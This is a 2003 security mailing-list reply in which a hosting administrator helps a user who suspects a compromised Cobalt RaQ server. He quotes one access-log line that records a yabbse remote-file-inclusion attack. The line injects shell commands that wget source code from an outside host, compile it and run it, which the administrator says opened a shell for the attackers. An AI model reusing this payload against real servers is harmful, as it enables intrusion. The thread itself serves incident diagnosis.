[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [cobalt-security] Comprimised Box
- Subject: Re: [cobalt-security] Comprimised Box
- From: Jeroen Wunnink <jeroen@xxxxxxxxxxxxxx>
- Date: Mon, 24 Mar 2003 10:11:14 +0100
- List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>
These tend to be files executed by hackers due to exploits in
sites..
I've had one this weekend too, hacker used an exploit in yabbse in this
way:
<hidden> - -
[22/Mar/2003:15:46:15 +0100] "GET
/yabbse/Sources/Packages.php?sourcedir=http://lesl13.hpg.com.br/cmd.txt?&cmd=md=mkdir%20/var/tmp/.xpl;%20cd%20/var/tmp/.xpl;%20wget%20www.lesl13.hpg.com.br/dsl.c;%20gcc%20-o%20dsl%20dsl.c;%20./dsl
HTTP/1.1" 200 318 "-" "Mozilla/4.0 (compatible; MSIE
6.0; Windows 98)"
Thus I had a ./dsl script running as user httpd which actually opened up
a terminal for hackers..
At 01:28 PM 3/20/2003 -0800, Nathan Kondra wrote:
I have found a weird file on my
box.
It is a RAQ 4i the file was ./sushi
it is attached I belive that i have been rooted some how and this
file is
the key, Can any one help me figure out what the hell this thing is and
what
it has been doing to my system.
Nathan Kondra
PS If needed i can attach the file
_______________________________________________
cobalt-security mailing list
cobalt-security@xxxxxxxxxxxxxxx
http://list.cobalt.com/mailman/listinfo/cobalt-security
Met vriendelijke groet,
Jeroen Wunnink,
systeembeheer@xxxxxxxxxxxxxx
telefoon:+31 (035) 6285455 Postbus 1332
fax: +31 (035) 6838242 1200 BH Hilversum
http://www.easyhosting.nl